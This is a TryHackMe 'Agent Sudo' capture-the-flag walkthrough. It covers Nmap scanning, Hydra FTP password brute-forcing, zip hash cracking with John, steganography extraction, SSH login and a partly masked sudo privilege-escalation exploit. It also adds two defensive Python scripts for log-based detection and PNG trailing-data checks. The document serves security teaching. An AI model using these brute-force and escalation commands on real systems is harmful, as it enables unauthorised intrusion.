Agent Sudo CTF — TryHackMe Writeup
You found a secret server located deep under the sea. Your mission? Hack inside the server and reveal the hidden truth. This walkthrough will guide you through the process step-by-step, from enumeration to privilege escalation.
0. Enumeration
Target IP: 10.10.165.175
To start, I ran an Nmap scan on the target, revealing three open ports:
nmap 10.10.165.175 -v
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Homepage Clue
Visiting http://10.10.165.175/ revealed the following message:
Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent R
The codename likely refers to a User-Agent string, probably a single letter (Agent A to Agent Z). To test this hypothesis, I used Burp Suite's Intruder to enumerate User-Agent values.
Using Burp Suite
I marked the User-Agent header as the payload position, loaded the letters A to Z as the payload list, and ran the attack through Intruder.
The response lengths for C and R differed from the rest: shorter for C and longer for R. Inspecting the R response showed the extra content:
What are you doing! Are you one of the 25 employees? If not, I going to report this incident
Dear agents,
Use your own <b>codename</b> as user-agent to access the site.
From,
Agent R
For C, the response was a `302` redirect with the header `Location: agent_C_attention.php`.
Visiting that page returned:
Attention chris,
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!
From,
Agent R
So codename C maps to the user `chris`, and the note says his password is weak.
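From the defender's side, the User-Agent cycling described above shows up in the web server's access log as one client presenting many distinct User-Agent values within a few seconds. The following Python script is an added example, not part of the original writeup: it parses combined-format access log lines and flags clients that present at least `threshold` distinct User-Agents inside a sliding time window. The log lines are constructed samples, and the window and threshold values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx combined log format, e.g.:
# 10.0.0.5 - - [08/Oct/2024:17:40:02 +0000] "GET / HTTP/1.1" 302 512 "-" "C"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None          # lines in another format are skipped
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "ts": ts,
            "status": int(m.group("status")), "ua": m.group("ua")}

def find_ua_enumeration(lines, window=timedelta(minutes=1), threshold=10):
    """Return {ip: set of User-Agents} for clients that presented at least
    `threshold` distinct User-Agent values inside any `window`-long span."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)
    flagged = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):          # sliding window over time
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            uas = {r["ua"] for r in recs[start:end + 1]}
            if len(uas) >= threshold:
                flagged[ip] = uas
                break
    return flagged

# Constructed sample: 10.0.0.5 cycles single-letter agents A..Z within 26 seconds
# (C gets the 302 redirect); 10.0.0.9 is an ordinary browser client.
SAMPLE_LOG = [
    f'10.0.0.5 - - [08/Oct/2024:17:40:{i:02d} +0000] "GET / HTTP/1.1" '
    f'{302 if c == "C" else 200} 512 "-" "{c}"'
    for i, c in enumerate("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
] + [
    '10.0.0.9 - - [08/Oct/2024:17:40:05 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [08/Oct/2024:17:41:07 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]
```

Running `find_ua_enumeration(SAMPLE_LOG)` flags only 10.0.0.5; the browser client with a single User-Agent is left alone.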
1. Attacking
Let's try cracking the FTP password for user chris. We will use hydra for the attack and rockyou.txt as the password list.
FTP Login
hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.165.175 ftp
After a successful FTP login, the directory listing showed:
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
All the files can be downloaded with the `get` command.
The message says that the password is stored inside one of the images, so we need to apply steganography techniques.
❯ cat To_agentJ.txt
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C
Steganography
Now run `binwalk` on both images to check for embedded data.
❯ binwalk cute-alien.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
❯ binwalk cutie.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22
Extracting cutie.png with `binwalk -e cutie.png` yields three files: 365, 365.zlib and 8702.zip. The zip is the interesting one, and it is password protected.
I used John the Ripper to crack the zip's password: first generate a hash with zip2john, then crack it with the wordlist:
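What binwalk spotted in cutie.png is a ZIP archive glued on after the PNG's final chunk. Any PNG can be checked for this kind of appended payload without binwalk by walking the chunk chain to the IEND chunk and inspecting whatever follows it. The Python below is an added example, not part of the original writeup: it builds a constructed 1x1 PNG and a constructed unencrypted zip in memory to demonstrate the check (so the encrypted flag reads False here, unlike the real 8702.zip).

```python
import io
import struct
import zipfile
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"

def png_end_offset(data):
    """Walk the chunk chain and return the offset just past the IEND chunk."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4            # length/type header + payload + CRC
        if ctype == b"IEND":
            return pos
    raise ValueError("truncated PNG: no IEND chunk")

def trailing_data_report(data):
    """Describe bytes appended after IEND; returns None for a clean PNG."""
    end = png_end_offset(data)
    tail = data[end:]
    if not tail:
        return None
    report = {"offset": end, "size": len(tail), "zip_entries": []}
    if tail.startswith(b"PK\x03\x04"):   # ZIP local file header signature
        with zipfile.ZipFile(io.BytesIO(tail)) as zf:
            for info in zf.infolist():
                encrypted = bool(info.flag_bits & 0x1)
                report["zip_entries"].append(
                    (info.filename, info.compress_size, info.file_size, encrypted))
    return report

def _chunk(ctype, payload):
    body = ctype + payload
    return struct.pack(">I", len(payload)) + body + struct.pack(">I", zlib.crc32(body))

def build_sample_png(appended=b""):
    """Constructed 1x1 grayscale PNG with `appended` bytes glued after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")    # one scanline: filter byte + one pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + appended

def build_sample_zip():
    """Constructed zip holding a To_agentR.txt stand-in (unencrypted)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("To_agentR.txt", "constructed sample note\n")
    return buf.getvalue()
```

On a real file, `trailing_data_report(open("cutie.png", "rb").read())` reports the offset, the size of the tail and each zip entry with its encrypted flag, which is the same information binwalk printed above.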
❯ zip2john 8702.zip > zip_pass.hash
❯ john --wordlist=/usr/share/wordlists/rockyou.txt zip_pass.hash
.............
Press 'q' or Ctrl-C to abort, almost any other key for status
ali** (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE (2024-10-08 17:45) 1.162g/s 28576p/s 28576c/s 28576C/s christal..280789
Session completed
Now that we have the zip password, extract the archive. It contains a message:
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
Here `QXJlYTUx` is base64 encoded; decode it with:
echo 'QXJlYTUx' | base64 -d
Area**
Now look into cute-alien.jpg using `steghide`. Running `steghide --info cute-alien.jpg` shows that a file named `message.txt` is embedded in it.
Finally, I extracted the hidden message from cute-alien.jpg with steghide:
steghide --extract -sf cute-alien.jpg
❯ cat message.txt
Hi jam**,
Glad you find this message. Your login password is hacker******
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris
2. Capture the Flag
I used the credentials to SSH into the server:
ssh jam**@10.10.165.175
After logging in, I captured the user flag.
To identify the incident shown in the photo `Alien_autospy.jpg`, download it (for example with scp) and run a reverse image search:
scp jam**@10.10.165.175:/home/jam**/Alien_autospy.jpg .
The search shows that the image is from the `Roswell` incident.
3. Privilege Escalation
Running `sudo -l` revealed that the user could run /bin/bash via sudo.
The sudo version (1.8.21p2) was vulnerable to CVE-2019-14***. Using an exploit from Exploit-DB, I escalated privileges to root:
sudo ***** /bin/bash
After successfully gaining root access, I retrieved the root flag.
The final message from Agent R reads:
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
By,
Des*** a.k.a Agent R
This was a fun and insightful challenge that covered enumeration, brute-forcing, steganography, and privilege escalation.
Happy hackers! Happy Hacking!!